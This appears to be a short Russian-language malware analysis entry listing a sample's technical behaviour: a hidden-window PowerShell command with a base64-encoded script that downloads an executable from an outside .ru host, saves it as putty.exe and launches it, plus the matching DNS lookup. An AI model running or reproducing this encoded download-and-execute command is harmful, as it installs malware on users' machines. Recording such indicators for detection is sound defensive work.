Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $code = 'JHBhdGggPSAiLi5ccHV0dHkuZXhlIjsgJHdjID0gbmV3LW9iamVjdCBuZXQud2ViY2xpZW50OyAkd2MuZG93bmxvYWRmaWxlKCJodHRwOi8vNGFuZHJvaWQtc29mdC5ydS8xL25lc2luZWdvLmV4ZSIsICRwYXRoKTsgc3RhcnQtcHJvY2VzcyAk...
- DNS ASK 4a####id-soft.ru
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $code = 'JHBhdGggPSAiLi5ccHV0dHkuZXhlIjsgJHdjID0gbmV3LW9iamVjdCBuZXQud2ViY2xpZW50OyAkd2MuZG93bmxvYWRmaWxlKCJodHRwOi8vNGFuZHJvaWQtc29mdC5ydS8xL25lc2luZWdvLmV4ZSIsICRwYXRoKTsgc3RhcnQtcHJvY2VzcyAk...' (со скрытым окном)